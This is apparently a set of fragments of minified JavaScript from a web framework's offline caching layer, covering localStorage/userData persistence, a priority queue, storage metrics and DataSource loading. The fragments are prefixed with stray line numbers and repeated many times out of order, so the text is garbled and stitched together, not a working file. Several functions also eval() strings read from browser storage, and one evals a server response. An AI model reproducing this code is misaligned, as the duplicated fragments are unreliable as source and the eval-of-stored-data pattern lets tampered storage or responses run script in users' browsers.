2424this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}2425if(!swapped)break}},getNextAttributeName:function(dataStore){if(this.unusedAttributeNumbers[dataStore]&&this.unusedAttributeNumbers[dataStore].length>0)2426{return"v"+this.unusedAttributeNumbers[dataStore].shift()}2427if(this.nextAttributeNumber[dataStore]==null){this.nextAttributeNumber[dataStore]=1}2428return"v"+this.nextAttributeNumber[dataStore]++},addToKeyIndex:function(userKey,dataStore,attr){var keyIndexValue=this.getKeyIndexValue(dataStore,attr);this.keyIndex[userKey]=keyIndexValue;this.reverseKeyIndex[keyIndexValue]=userKey;this.saveKeyIndex()},removeFromKeyIndex:function(userKey){var keyIndexValue=this.keyIndex[userKey];delete this.keyIndex[userKey];delete this.reverseKeyIndex[keyIndexValue];this.saveKeyIndex()},saveKeyIndex:function(){this.keyIndexStore.setAttribute(this.keyIndexKey,Offline.serialize(this.keyIndex));this.keyIndexStore.setAttribute(this.reverseKeyIndexKey,Offline.serialize(this.reverseKeyIndex));this.keyIndexStore.save("isc_userData_keyIndex")},buildReverseKeyIndex:function(){this.reverseKeyIndex={};for(var key in this.keyIndex){this.reverseKeyIndex[keyIndex[key]]=key}},getKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.keyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2429return ki},getReverseKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.reverseKeyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2430return ki}};if(window.isc){isc.defineClass("Offline").addClassProperties(Offline);isc.defineClass("UserDataPersistence").addClassProperties(UserDataPersistence)}


else{isc.addProperties=function(objOne,objTwo){for(var propName in objTwo)objOne[propName]=objTwo[propName]}2431isc.addProperties(isc.Offline,{serialize:function(object){return isc.OfflineJSONEncoder.encode(object)},logDebug:function(message){if(console)console.log(message)},logError:function(message){if(console){console.log(message)}else{alert(message)}},echoLeaf:function(obj){var output="",undef;if(obj===undef)return"undef";try{if(typeof obj=="Array"){output+="Array["+obj.length+"]"}else if(typeof obj=="Date"){output+="Date("+obj.toShortDate()+")"}else if(typeof obj=="Function"){output+=isc.Func.getName(obj,true)+"()"}else{switch(typeof obj){case"string":if(obj.length<=40){output+='"'+obj+'"';break}2432output+='"'+obj.substring(0,40)+'..."['+obj.length+']';output=output.replaceAll("\n","\\n").replaceAll("\r","\\r");break;case"object":if(obj==null){output+="null";break}2433if(obj.tagName!=null){output+="["+obj.tagName+"Element]";break}2434var toString=""+obj;if(toString!=""&&toString!="[object Object]"&&toString!="[object]")


2390this.logDebug("Cache full when updating priority queue or metrics; rolling back the entire update");this.$786(key);if(pqOK)this.removeFromPriorityQueue(key);this.rebuildMetrics();throw e}else{throw e}}}2391this.logDebug("put() with key: "+key+"\nitem: "+this.echoLeaf(value)+": "+(end-ts)+"ms. Maintaining the priority queue and metrics took a further "+new Date().getTime()-end+"ms")},$788:function(key,value,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.setItem(key,value);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.putValue(key,value);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:this.logError("Persistence method '"+this.localStorageType()+"' not yet supported");break}},isStorageException:function(e){switch(this.localStorageType()){case this.LOCAL_STORAGE:if(isc.Browser.isIE){return(e.number==-2147024882)}else if(isc.Browser.isMoz){return(e.name=="NS_ERROR_DOM_QUOTA_REACHED")}else{return(e.name=="QUOTA_EXCEEDED_ERR")}2392break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2393if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}


2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}


2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2401return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2403this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}2404this.$788(this.countKey,entries);this.$788(this.keyKey,keyBytes);this.$788(this.valueKey,valueBytes)},getStorageMetrics:function(){var storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0,countLen=0,keyLen=0,valueLen=0;if(storedEntries)countLen=storedEntries.length;if(storedKeyBytes)keyLen=storedKeyBytes.length;if(storedValueBytes)valueLen=storedValueBytes.length;storedEntries=1*storedEntries;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;var pqText=this.get(this.priorityQueueKey);var overhead=this.countKey.length+this.keyKey.length+this.valueKey.length+countLen+keyLen+valueLen;var pqLength=pqText==null?0:pqText.length+(this.KEY_PREFIX+this.priorityQueueKey).length;return{storedEntries:storedEntries,storedKeyBytes:storedKeyBytes,storedValueBytes:storedValueBytes,metricsOverhead:overhead,priorityQueue:pqLength,total:storedKeyBytes+storedValueBytes+overhead+pqLength}},getTotalStorageUsed:function(){var metrics=this.getStorageMetrics();return metrics.storedKeyBytes+metrics.storedValueBytes+metrics.metricsOverhead+metrics.priorityQueue},storeResponse:function(dsRequest,dsResponse){var ts=new Date().getTime();dsResponse.offlineTimestamp=ts;var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.serialize(this.trimResponse(dsResponse));this.logDebug("storeResponse serializing: "+(new Date().getTime()-ts)+"ms");if(this.get(key)==null){if(this.getSCStoredValuesCount()>=this.maxResponsesToPersist){this.removeOldestEntry()}}



2393if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2401return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2403this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}


292}293return _1}294,isc.A.load=function isc_c_DataSource_load(_1,_2,_3,_4){if(!isc.isAn.Array(_1))_1=[_1];if(_1.length<=0){this.logWarn("No DataSource IDs passed in.");return}295var _5=[];for(var i=0;i<_1.length;i++){if(!this.isLoaded(_1[i])||_3)_5.add(_1[i])}296var _7=_5.join(","),_8=isc.DataSource.loaderURL+(isc.DataSource.loaderURL.contains("?")?"&":"?")+(_4?"loadParents=true&":"")+"dataSource="+_7,_9=_1;;if(_5.length>0){isc.RPCManager.send(null,function(_10,_11,_12){if(_10.httpResponseCode==404){isc.warn("The DataSourceLoader servlet is not installed.");return null}


297if(_4&&!_3)isc.DataSource.$92w=true;try{eval(_11)}catch(e){isc.logWarn("Encountered problems trying to load DataSources: "+isc.echoAll(e))}298delete isc.DataSource.$92w;if(_2)this.fireCallback(_2,["dsID"],[_9])},{actionURL:_8,httpMethod:"GET",willHandleError:true299}300)}else{this.logWarn("DataSource(s) already loaded: "+_1.join(",")+"\nUse forceReload to reload such DataSources");if(_2)this.fireCallback(_2,["dsID"],[_9])}301}302,isc.A.loadWithParents=function isc_c_DataSource_loadWithParents(_1,_2,_3){this.load(_1,_2,_3,true)}


2392break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2393if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2401return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}



2423counter++}2424this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}2425if(!swapped)break}},getNextAttributeName:function(dataStore){if(this.unusedAttributeNumbers[dataStore]&&this.unusedAttributeNumbers[dataStore].length>0)2426{return"v"+this.unusedAttributeNumbers[dataStore].shift()}2427if(this.nextAttributeNumber[dataStore]==null){this.nextAttributeNumber[dataStore]=1}2428return"v"+this.nextAttributeNumber[dataStore]++},addToKeyIndex:function(userKey,dataStore,attr){var keyIndexValue=this.getKeyIndexValue(dataStore,attr);this.keyIndex[userKey]=keyIndexValue;this.reverseKeyIndex[keyIndexValue]=userKey;this.saveKeyIndex()},removeFromKeyIndex:function(userKey){var keyIndexValue=this.keyIndex[userKey];delete this.keyIndex[userKey];delete this.reverseKeyIndex[keyIndexValue];this.saveKeyIndex()},saveKeyIndex:function(){this.keyIndexStore.setAttribute(this.keyIndexKey,Offline.serialize(this.keyIndex));this.keyIndexStore.setAttribute(this.reverseKeyIndexKey,Offline.serialize(this.reverseKeyIndex));this.keyIndexStore.save("isc_userData_keyIndex")},buildReverseKeyIndex:function(){this.reverseKeyIndex={};for(var key in this.keyIndex){this.reverseKeyIndex[keyIndex[key]]=key}},getKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.keyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2429return ki},getReverseKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.reverseKeyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2430return ki}};if(window.isc){isc.defineClass("Offline").addClassProperties(Offline);isc.defineClass("UserDataPersistence").addClassProperties(UserDataPersistence)}else{isc.addProperties=function(objOne,objTwo){for(var propName in objTwo)objOne[propName]=objTwo[propName]}2431isc.addProperties(isc.Offline,{serialize:function(object){return isc.OfflineJSONEncoder.encode(object)},logDebug:function(message){if(console)console.log(message)},logError:function(message){if(console){console.log(message)}else{alert(message)}},echoLeaf:function(obj){var output="",undef;if(obj===undef)return"undef";try{if(typeof obj=="Array"){output+="Array["+obj.length+"]"}else if(typeof obj=="Date"){output+="Date("+obj.toShortDate()+")"}else if(typeof obj=="Function"){output+=isc.Func.getName(obj,true)+"()"}else{switch(typeof obj){case"string":if(obj.length<=40){output+='"'+obj+'"';break}2432output+='"'+obj.substring(0,40)+'..."['+obj.length+']';output=output.replaceAll("\n","\\n").replaceAll("\r","\\r");break;case"object":if(obj==null){output+="null";break}2433if(obj.tagName!=null){output+="["+obj.tagName+"Element]";break}


2389var end=new Date().getTime();var pqOK=false,metricsOK=false;while(!pqOK||!metricsOK){try{if(!pqOK)this.addToPriorityQueue(key);pqOK=true;if(!metricsOK)this.updateMetrics("put",key,value,oldValue);metricsOK=true}catch(e){if(this.isStorageException(e)){if(recycleEntries!==false){var entries=this.getStorageMetrics().storedEntries;if(entries>0){this.logDebug("Cache full when updating priority queue or metrics; removing oldest entry and trying again");this.removeOldestEntry();continue}}2390this.logDebug("Cache full when updating priority queue or metrics; rolling back the entire update");this.$786(key);if(pqOK)this.removeFromPriorityQueue(key);this.rebuildMetrics();throw e}else{throw e}}}2391this.logDebug("put() with key: "+key+"\nitem: "+this.echoLeaf(value)+": "+(end-ts)+"ms. Maintaining the priority queue and metrics took a further "+new Date().getTime()-end+"ms")},$788:function(key,value,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.setItem(key,value);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.putValue(key,value);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:this.logError("Persistence method '"+this.localStorageType()+"' not yet supported");break}},isStorageException:function(e){switch(this.localStorageType()){case this.LOCAL_STORAGE:if(isc.Browser.isIE){return(e.number==-2147024882)}else if(isc.Browser.isMoz){return(e.name=="NS_ERROR_DOM_QUOTA_REACHED")}else{return(e.name=="QUOTA_EXCEEDED_ERR")}2392break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2393


if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}


2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2403this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}2404this.$788(this.countKey,entries);this.$788(this.keyKey,keyBytes);this.$788(this.valueKey,valueBytes)},getStorageMetrics:function(){var storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0,countLen=0,keyLen=0,valueLen=0;if(storedEntries)countLen=storedEntries.length;if(storedKeyBytes)keyLen=storedKeyBytes.length;if(storedValueBytes)valueLen=storedValueBytes.length;storedEntries=1*storedEntries;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;var pqText=this.get(this.priorityQueueKey);var overhead=this.countKey.length+this.keyKey.length+this.valueKey.length+countLen+keyLen+valueLen;var pqLength=pqText==null?0:pqText.length+(this.KEY_PREFIX+this.priorityQueueKey).length;return{storedEntries:storedEntries,storedKeyBytes:storedKeyBytes,storedValueBytes:storedValueBytes,metricsOverhead:overhead,priorityQueue:pqLength,total:storedKeyBytes+storedValueBytes+overhead+pqLength}},getTotalStorageUsed:function(){var metrics=this.getStorageMetrics();return metrics.storedKeyBytes+metrics.storedValueBytes+metrics.metricsOverhead+metrics.priorityQueue},storeResponse:function(dsRequest,dsResponse){var ts=new Date().getTime();dsResponse.offlineTimestamp=ts;var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.serialize(this.trimResponse(dsResponse));this.logDebug("storeResponse serializing: "+(new Date().getTime()-ts)+"ms");if(this.get(key)==null){if(this.getSCStoredValuesCount()>=this.maxResponsesToPersist){this.removeOldestEntry()}}2405this.put(key,value)},trimRequest:function(dsRequest){var keyProps=["dataSource","operationType","operationId","textMatchStyle","values","sortBy","startRow","endRow","data"],trimmed={},undef;for(var i=0;i<keyProps.length;i++){if(dsRequest[keyProps[i]]!==undef){trimmed[keyProps[i]]=dsRequest[keyProps[i]]}}2406return trimmed},trimResponse:function(dsResponse){var keyProps=["dataSource","startRow","endRow","totalRows","data","offlineTimestamp","status","errors","invalidateCache","cacheTimestamp"],trimmed={},undef;for(var i=0;i<keyProps.length;i++){if(dsResponse[keyProps[i]]!==undef){trimmed[keyProps[i]]=dsResponse[keyProps[i]]}}


